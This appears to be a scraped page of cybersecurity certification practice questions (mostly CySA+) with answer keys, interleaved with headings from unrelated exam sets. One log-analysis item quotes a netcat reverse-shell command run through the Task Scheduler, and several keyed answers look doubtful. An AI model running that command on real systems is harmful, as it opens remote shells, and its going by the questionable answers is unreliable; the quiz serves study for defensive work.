CompTIA CySA+ (CS0-001) 5 Practice Certification Exams Set 4

Bob needs to verify that workstations he is responsible for have received a particular critical Windows patch. Which method should be used to validate the patch status for all of the Windows 10 systems?


Options are :

  • Check the Update History manually
  • Run a Nessus scan for the particular CVE
  • Create and run a PowerShell script to search for the specific patch in question
  • Use SCCM to validate patch status for each machine on the domain

Answer :Run a Nessus scan for the particular CVE

CompTIA JK0-801 A Laptop Printer and Operating certify Exam Set 4

Jamie has been tasked with finding a rogue network device on her wired network. What option is NOT likely to help identify the rogue device?


Options are :

  • MAC validation
  • Port scanning
  • Site surveys
  • War-walking

Answer :War-walking

If there is an expected loss of ______ or more, then the federal government classifies the economic impact of a security incident as high.


Options are :

  • $1
  • $10,000
  • $100,000
  • $500,000

Answer :$500,000

Alissa doesn’t want to run a program installed by a user that she believes is set with a RunOnce key in the registry but she needs to boot the system. What can she do to prevent the RunOnce from executing the programs listed in the registry key?


Options are :

  • Disable the registry at boot
  • Boot with Safe Mode
  • Boot with the –RunOnce flag
  • RunOnce cannot be disabled; she will need to boot from external media to disable it first.

Answer :Boot with Safe Mode

CompTIA JK0-015 E2C Security+ Certification Practice Test Set 26

Tanner needs to sanitize hard drives from several leased workstations that are being returned to the supplier at the end of the lease period. The drives contained information that his organization classifies as sensitive data that some companies would find valuable if they could obtain it. Which is the most appropriate choice to ensure that data exposure doesn’t occur during this process?


Options are :

  • Clear, validate, and document
  • Purge the drives
  • Purge, validate, and document
  • The drives must be destroyed to ensure no data loss

Answer :Purge, validate, and document

You are a cyber security analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is TRUE? 

BEGIN OUTPUT
———————---------

# nmap win2k12.local

Nmap scan report for win2k12 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports 
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http 

# nc win2k12.local 80

220 win2k12.local BeverageCorp SMTP Server (Postfix/2.4.1) 

# nc win2k12.local 22 SSH-2.0-OpenSSH_7.2 Debian-2  #

———————---------
END OUTPUT


Options are :

  • Your email server is running on a non-standard port
  • Your email server has been compromised
  • Your organization has a vulnerable version of the SSH server software installed
  • Your web server has been compromised

Answer :Your email server is running on a non-standard port

You have been asked in by the Security Operations Center Manager to look over a recent network utilization report because he fears that something may be wrong. The report is as follows:


IP Address        Server Name    Server Uptime        Historical      Current
192.168.20.2    web01                7D 12H 32M 06S     42.6 GB     44.1 GB
192.168.20.3    webdev02         4D 07H 12M 45S     1.95 GB      2.13 GB
192.168.20.4    dbsvr01            12D 02H 46M 14S     3.15 GB     24.6 GB
192.168.20.5    marketing01      2D 17H 18M 41S     5.2 GB       4.9 GB 

Based on the report provided, what server do you think your cyber security analysts need to investigate further?


Options are :

  • web01
  • webdev02
  • dbsvr01
  • marketing01

Answer :dbsvr01

CD0-001 CDIA+ Certification Practice Exam Set 6

You are a cyber security analyst and have been asked to review the following packet of information: 

23:12:23.154234 IP 172.18.10.3:25 > 192.168.10.45:3389 Flags [P.], Seq 1834:1245, ack1, win 511, options [nop,nop, TS val 263451334 erc 482862734, length 125

After looking over the information on the packet, you discovered there is an unauthorized service running on the host. What ACL should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on that host?


Options are :

  • DENY TCP ANY HOST 192.168.10.45 EQ 3389
  • DENY IP HOST 192.168.10.45 ANY EQ 25
  • DENY IP HOST 172.18.10.3 HOST 192.168.10.45 EQ 3389
  • DENY TCP ANY HOST 172.18.10.3 EQ 25

Answer :DENY TCP ANY HOST 192.168.10.45 EQ 3389

Your company has recently been the victim of a large scale data breach. The hackers were able to exfiltrate the personal information and social security numbers of your customers during their attack. The Chief Executive Officer has notified law enforcement about the breach and they will be assisting with the investigation into the cause and to help collect evidence to attempt to put the hackers into prison. What actions should you take in response to this event?


Options are :

  • You should provide training to all your employees about the proper incident communication channels to use during a security event
  • You should ask all employees to commit to an NDA about the data breach verbally
  • You should block all employee access to social media from the company’s network
  • You should ask a member of law enforcement to meet with your employees

Answer :You should ask a member of law enforcement to meet with your employees

Certain permissions are set on a directory structure on a Windows system that Tony is currently investigating. Which Sysinternals tool will provide him with this information?


Options are :

  • DiskView
  • AccessEnum
  • du
  • AccessChk

Answer :AccessEnum

CompTIA Cloud Essentials CLO-001 Certified Practice Exam Set 5

Jonathan’s team completed the first phase of their incident response process. They’re currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover but this requires additional resources. How should he categorize this using the NIST model?


Options are :

  • Regular
  • Supplemented
  • Extended
  • Not recoverable

Answer :Supplemented

What is NOT a means of improving data validation and trust?


Options are :

  • Encrypting data in transit
  • Using MD5 checksums for files
  • Decrypting data at rest
  • Implementing Tripwire

Answer :Decrypting data at rest

Rhett is currently tracing activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place?


Options are :

  • Privilege escalation
  • Phishing
  • Social engineering
  • Session hijacking

Answer :Privilege escalation

FC0-U41 CompTIA Strata IT Fundamentals Practice Test Set 10

Ellen is asked for a code that is sent to her via text (SMS) message during her login process. What concerns should she raise to the manager of her organization’s AAA services?


Options are :

  • SMS should be encrypted to be secure.
  • SMS messages may be accessible to attackers via VoIP or other systems.
  • SMS should be paired with a third factor.
  • SMS is secure, and she should not raise a concern.

Answer :SMS messages may be accessible to attackers via VoIP or other systems.

Stewart is responsible for conducting periodic reviews of the information security policy for his organization, of which he is the CISO. The policy was drafted three years ago and has had a few revisions after some audits and assessments have taken place. Which of the following is the most reasonable frequency to conduct formal reviews?


Options are :

  • Monthly
  • Quarterly
  • Annually
  • Every five years

Answer :Annually

A software assurance laboratory is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. In what phase of the SDLC does fuzzing occur?


Options are :

  • Planning phase
  • Requirements phase
  • Prototyping phase
  • Static code analysis

Answer :Prototyping phase

CompTIA Cyber Security Analyst (CySA+) Practice Exams 2019 Set 5

Of the following connection status messages, which one indicates an active connection between two systems?


Options are :

  • ESTABLISHED
  • LISTENING
  • LAST_ACK
  • CLOSE_WAIT

Answer :ESTABLISHED

You have been hired as a consultant to help a company, Blueboard Enterprises, develop a new disaster recovery plan. Blueboard has recently grown in the number of employees, and so has its information systems infrastructure to support those new employees. Unfortunately, Blueboard doesn’t currently have any documentation, policies, or procedures for its network. What is the first step you should recommend to Blueboard’s management in order to help in the development of the disaster recovery plan?


Options are :

  • Conduct a risk assessment
  • Develop a data retention policy
  • Execute vulnerability scanning
  • Identify assets

Answer :Identify assets

What type of controls are Firewalls, intrusion detection systems, and RADIUS examples of?


Options are :

  • Administrative controls
  • Technical controls
  • Physical controls
  • Compensating controls

Answer :Technical controls

CompTIA Network+ (N10-007) : 6 Practice Exams - 2019 Set 6

Which protocol is paired with OAuth2 to provide authentication services in a federated identity management solution on the Web?


Options are :

  • Kerberos
  • ADFS
  • SAML
  • OpenID

Answer :OpenID

Joe and Mary work together to review Joe’s code with Mary explaining the code he wrote as he reviews it. What code review technique are Joe and Mary using?


Options are :

  • Pair programming
  • Dual control
  • Over-the-shoulder
  • Tool assisted review

Answer :Over-the-shoulder

Which of the following is not normally part of an endpoint security suite?


Options are :

  • IPS
  • Firewall
  • Antimalware
  • VPN

Answer :VPN

SK0-004 CompTIA Server+ Certification Practice Exam Set 3

Lisa is working with a development team on including security best practices in the SDLC. She frequently consults the Center for Internet Security’s system design recommendations. Which of the following control categories would contain information helpful for her?


Options are :

  • Inventory of authorized/unauthorized devices
  • Controlled use of administrative privileges
  • Application software security
  • Malware defenses

Answer :Application software security

Nate has been tasked with choosing a firewall to protect his organization’s internal infrastructure to help protect his organization from network-based attacks. Which of the following is not an option that would meet his requirements?


Options are :

  • Cisco NGFW
  • HP TippingPoint
  • CheckPoint appliance
  • Palo Alto NGFW

Answer :HP TippingPoint

Of the following vulnerability scanning tools, which option is limited to collecting information from specific operating systems only?


Options are :

  • Nikto
  • OpenVAS
  • MBSA
  • Qualys

Answer :MBSA

CompTIA PD1-001 PDI+ Beta Certification Practice Exam Set 24

Which tool would allow you to conduct operating system fingerprinting, which typically relies on responses to TCP/IP stack fingerprinting techniques?


Options are :

  • nmap
  • dd
  • scanf
  • msconfig

Answer :nmap

What role does the offensive participants perform in a table top exercise (TTX)?


Options are :

  • Security analysts
  • System administrators
  • Blue team
  • Red Team

Answer :Red Team

What is the lowest layer (bottom layer) of a bare-metal virtualization environment?


Options are :

  • Hypervisor
  • Host operating system
  • Guest operating system
  • Physical hardware

Answer :Physical hardware

SY0-401 CompTIA Security+ Certification Practice Exam Set 6

What control provides the best protection against both SQL injection and cross-site scripting attacks?


Options are :

  • Hypervisors
  • Network layer firewalls
  • CSRF
  • Input validation

Answer :Input validation

You have just completed running a vulnerability scan and received the following output: 

CVE-2011-3389
QID 42366 - SSLv3.0 / TLSv1.0
Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect qualys.jive.mobile.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES” 

What vulnerability was identified by the scan?


Options are :

  • PKI transfer vulnerability
  • Active Directory encryption vulnerability
  • Web application cryptography vulnerability
  • VPN tunnel vulnerability

Answer :Web application cryptography vulnerability

A recent vulnerability scan found several vulnerabilities on an organization’s public internet- facing IP addresses. In order to reduce the risk of a breach, what vulnerability should be prioritized for remediation first?


Options are :

  • A cryptographically weak encryption cipher
  • A website utilizing a self-signed SSL certificate
  • A buffer overflow that is known to allow remote code execution
  • An HTTP response that reveals an internal IP address

Answer :A buffer overflow that is known to allow remote code execution

CAS-001 CompTIA Advanced Security Practitioner Practice Exam Set 3

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?


Options are :

  • Zone transfers
  • DNS registration
  • AXR
  • DNSSEC

Answer :Zone transfers

You have been tasked to create some baseline system images in order to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry standard benchmarks?


Options are :

  • Utilizing an operating system SCAP plugin
  • Utilizing an authorized credential scan
  • Utilizing a non-credential scan
  • Utilizing a known malware plugin

Answer :Utilizing an operating system SCAP plugin

Vulnerability scans must be conducted on a continuous basis in order to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cyber security analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. What should the analyst do next?


Options are :

  • The analyst should attempt to identify all the false positives and exceptions, then resolve all the remaining items.
  • The analyst should wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully.
  • The analyst should place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities.
  • The analyst should filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

Answer :The analyst should filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

CompTIA CT0-101 Convergence+ Certification Practice Exam Set 4

What provides a standard nomenclature for describing security-related software flaws?


Options are :

  • CVE
  • SOX
  • Patch
  • Vulnerability

Answer :CVE

Which of the protocols listed is not likely to be a trigger for a vulnerability scan alert when it’s used to support a virtual private network (VPN)?


Options are :

  • IPSec
  • SSLv2
  • PPTP
  • SSLv3

Answer :IPSec

A cyber security analyst works at a college that wants to increase the security of its network by implementing vulnerability scans of both centrally-managed workstations, student laptops, and faculty laptops. This solution must be able to scale up or down as new students and faculty use the network. Additionally, the college wants to minimize the amount of false positives and ensure a high accuracy of the results. The solution must also be centrally-managed through an enterprise console. What scanning topology would be BEST to meet these requirements?


Options are :

  • Passive scanning engine located at the core of the network infrastructure
  • Combination of cloud-based and server-based scanning engines
  • Combination of server-based and agent-based scanning engines
  • Active scanning engine installed on the enterprise console

Answer :Active scanning engine installed on the enterprise console

CompTIA Security+ Cert. (SY0-501): Practice Tests 2019 Set 7

Which one of the listed approaches give the most current and accurate information about the vulnerabilities present in a system because of an operating system that has misconfigured settings?


Options are :

  • On-demand vulnerability scanning
  • Continuous vulnerability scanning
  • Scheduled vulnerability scanning
  • Agent-based monitoring

Answer :Agent-based monitoring

Marsha noticed that a management interface for a virtualization platform was exposed to a scanner when performing a vulnerability scan of her data center. In normal circumstances, what would the proper exposure for this interface be?


Options are :

  • Internet
  • Internal networks
  • No exposure
  • Management network

Answer :Management network

What is an insecure protocol that should not be used?


Options are :

  • Telnet
  • SSH
  • SFTP
  • HTTPS

Answer :Telnet

CompTIA JK0-019 E2C Network Media & Topologies Practice Exam Set 5

Greg is worried over theft of sensitive information that’s stored in a database. Which of the following vulnerabilities have a direct threat to this information?


Options are :

  • SQL injection
  • Cross-site scripting
  • Buffer overflow
  • Denial of service

Answer :SQL injection

Neil ran a port scan on a network device. Which of the following ports listed (open) represents the most significant possible security vulnerability?


Options are :

  • 22
  • 23
  • 161
  • 443

Answer :23

Which of the following is the most difficult to confirm with an external vulnerability scan?


Options are :

  • Cross-site scripting (XSS)
  • Cross-site request forgery (XSRF/CSRF)
  • Blind SQL injection
  • Unpatched web server

Answer :Blind SQL injection

N10-006 CompTIA Network+ Certification Practice Test Set 4

Edward's IDS reports that ports 1 to 1024 received SYN packets from a remote host. What has likely happened to cause this traffic?


Options are :

  • Remote host cannot find the right service port
  • SYN flood
  • Port scan
  • UDP probe

Answer :Port scan

A company has an open investigation and hires you as a cyber security analyst to assist with the investigation. When you arrive, you begin by reviewing some security logs. During the log review, you notice the following snippet of code: 

sc config schedule start auto net start schedule at 10:42 “”c:\temp\nc.exe 172.16.34.12 443 -e cmd.exe “” 

What BEST describes the situation and recommendations you should make to remedy this situation?


Options are :

  • The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not currently a threat.
  • The host (172.16.34.12) is beaconing every day at 10:42 by running nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is a rogue device on the network; You recommend removing the host from the network.

Answer :The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.

Comment / Suggestion Section